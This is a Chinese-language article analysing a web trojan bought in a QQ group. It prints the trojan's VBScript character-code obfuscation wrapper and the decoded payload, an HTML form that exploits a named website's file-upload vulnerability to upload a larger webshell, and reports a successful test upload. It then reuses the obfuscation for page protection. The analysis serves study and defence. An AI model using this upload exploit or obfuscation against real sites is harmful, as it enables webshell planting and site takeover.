QQ群中，有人在叫賣網(wǎng)馬。網(wǎng)友花錢獲得一個(gè)共享給我，讓我看看。于是有了下面的這篇文章。
　　1.網(wǎng)馬初探

　　在瀏覽器中打開網(wǎng)馬，這個(gè)網(wǎng)馬的功能比較簡單，主要用來上傳功能更強(qiáng)的網(wǎng)馬。比較有特色的是可以在目標(biāo)網(wǎng)頁的上傳漏洞，自己修改修改配置。查看該網(wǎng)馬的源代碼，發(fā)現(xiàn)該網(wǎng)馬加密了，很明顯是用ASC加密。(圖1)



　　2.網(wǎng)馬分析

　　雖然該網(wǎng)馬的核心功能代碼進(jìn)行ASC加密了，但其框架一目了然。其代碼及其解釋如下：

<script language=vbscript>
'可以看到該網(wǎng)馬是一個(gè)VB腳本
function rechange(k)
'定義了一個(gè)rechange函數(shù)，該函數(shù)定義了一個(gè)變量k
s=Split(k,",")
'split的作用是把k以“,”分開，把其定義為一個(gè)數(shù)組
t=""
給t賦空值；
For i = 0 To UBound(s)
t=t Chrw(eval(s(i)))
用for進(jìn)行循環(huán)轉(zhuǎn)換，把t值轉(zhuǎn)換為字符，依次累加。UBound是數(shù)組的維數(shù)，Chrw是字符轉(zhuǎn)換函數(shù)。
Next
rechange=t
把t返回到函數(shù)
End Function
t="60,33,68,79,67,84,89,80,69,32,104,116,109,108,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,88,72,84,77,76,32,49,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47,......"
'中間省略N多,這就是網(wǎng)馬的功能代碼
document.write rechange(t)
'在瀏覽器中輸出函數(shù)值
</script>


　　3.網(wǎng)馬解密

　　可以自行編寫一個(gè)ASC解密工具，筆者從網(wǎng)上下載了別人的ASC解密代碼，然后根據(jù)該網(wǎng)馬的加密原理進(jìn)行修改重新編譯生成解密工具。

　　運(yùn)行該工具，把該網(wǎng)馬源代碼t后面的值拷貝至工具相應(yīng)的文本框中點(diǎn)擊解密，即可還原該網(wǎng)馬的源代碼。(圖2)



<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="STYLE4"> 源(</span><span class="STYLE3">圖片</span><span class="STYLE4">)文件：
</span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
目標(biāo)(</span><span class="STYLE3">大馬</span><span class="STYLE4">)文件：
</span>
<input name="filename1" type=file class=buttonUnActive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上傳大馬 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>

4.解密效果
　　拷貝解密后的html代碼保存為一test.htm文件，在瀏覽器中打開，進(jìn)行上傳測(cè)試成功，說明對(duì)該網(wǎng)馬的ASC解密成功。(圖3)



　　5.加密利用

　　在破解了該網(wǎng)馬的ASC加密之后，我們利用該網(wǎng)馬的加密原理對(duì)我們的網(wǎng)頁進(jìn)行加密，達(dá)到保護(hù)網(wǎng)頁代碼的效果。ASC加密主要用來保護(hù)靜態(tài)頁面代碼，動(dòng)態(tài)代碼由于在服務(wù)器端，客戶端顯示的只是運(yùn)行結(jié)果?！癐T專家網(wǎng)”的頁面是動(dòng)態(tài)生成的，作為演示就以它為例進(jìn)行。

　　查看并拷貝網(wǎng)頁代碼，通過“ASCCII速查器”把字符轉(zhuǎn)換成ASC值。然后把生成的ASC值拷貝到我們破解的網(wǎng)馬代碼中作為t的值。這樣可以別人就不能看到網(wǎng)頁源代碼，看到的只是其的ASC值，對(duì)網(wǎng)頁代碼起到了一定的保護(hù)作用，運(yùn)行效果和加密前完全一樣。(圖4)



　　總結(jié)：ASC加密是當(dāng)前靜態(tài)網(wǎng)頁加密的主要形式，從上面筆者對(duì)某網(wǎng)馬的解密看，這種加密形式并不能從根本上保證網(wǎng)頁代碼的安全?；诠P者及其朋友網(wǎng)站維護(hù)的經(jīng)驗(yàn)，推薦幾種網(wǎng)頁加密方法：

　　1.腳本加密，通過類似VB、JAVA這樣腳本代碼實(shí)現(xiàn)：封鎖鼠標(biāo)右鍵、禁止查看源文件、鏈接調(diào)用地址加密等功能。

　　2.IIS的密碼，通過對(duì)IIS的安全、驗(yàn)證等部署，防止非授權(quán)的訪問。

　　3.ASP程序加密，使用ASP程序來給網(wǎng)頁進(jìn)行加密，現(xiàn)在大多數(shù)網(wǎng)站都使用ASP程序，它對(duì)Web服務(wù)器沒有具體要求，而其加密就是借助數(shù)據(jù)庫及ASP程序進(jìn)行設(shè)計(jì)，來實(shí)現(xiàn)一種通用網(wǎng)頁加密。

　　4.軟件加密，現(xiàn)在給網(wǎng)頁加密的軟件非常多，其基本原理都是利用javascript代碼，只不過是這些軟件都自動(dòng)準(zhǔn)備好了這些代碼，只需使用者將網(wǎng)頁源代碼粘進(jìn)去點(diǎn)擊“加密”按鈕就可以了。

最新評(píng)論